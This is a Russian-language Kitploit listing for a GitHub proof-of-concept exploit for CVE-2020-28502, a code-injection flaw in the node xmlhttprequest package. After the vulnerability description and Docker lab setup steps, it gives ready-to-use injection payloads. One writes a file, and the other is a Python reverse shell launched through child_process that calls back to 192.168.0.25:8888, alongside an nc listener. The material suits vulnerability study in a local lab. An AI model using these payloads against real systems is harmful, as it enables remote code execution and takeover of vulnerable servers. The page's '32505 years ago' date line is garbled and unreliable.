Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2020-28502 — CVE-2020-28502 node-XMLHttpRequest RCE | Kitploit
Инструменты/GitHubGitHub/s-index/cve-2020-28502
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийОбучение и ОбразованиеИнструмент Удаленного ДоступаРазработка Полезной Нагрузки
GitHubs-index/cve-2020-28502

CVE-2020-28502

CVE-2020-28502 node-XMLHttpRequest RCE

Репозиторий
32505 лет назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2020-28502 node-XMLHttpRequest RCE

Описание NVD

Это затрагивает пакет xmlhttprequest до версии 1.7.0; все версии пакета xmlhttprequest-ssl. При отправке запросов синхронно (async=False в xhr.open) вредоносный пользовательский ввод, передаваемый в xhr.send, может привести к внедрению и выполнению произвольного кода.

Демонстрация

cve-2020-28502

Установка

  1. Соберите образ из Dockerfile
root@kitploit:~
$ docker build -t cve-2020-28502 .
  1. Запустите node app.js в новом контейнере
root@kitploit:~
$ docker run --rm -p 3000:3000 cve-2020-28502
  1. Откройте http://localhost:3000

localhost-image

PoC-полезная нагрузка

Добавление файла

Скачать инструмент

Отправьте нагрузку

root@kitploit:~
\');require("fs").writeFileSync("./exploit.txt", "exploit!");req.end();//

Обратная оболочка

  1. Прослушивание подключений
root@kitploit:~
$ nc -l 8888
  1. Отправьте нагрузку

измените IP-адрес (192.168.0.25) на ваш локальный IP-адрес

root@kitploit:~
\');require("child_process").exec("python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"192.168.0.25\",8888));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn(\"/bin/bash\")'");req.end();//

Ссылка

  • https://snyk.io/vuln/SNYK-JS-XMLHTTPREQUEST-1082935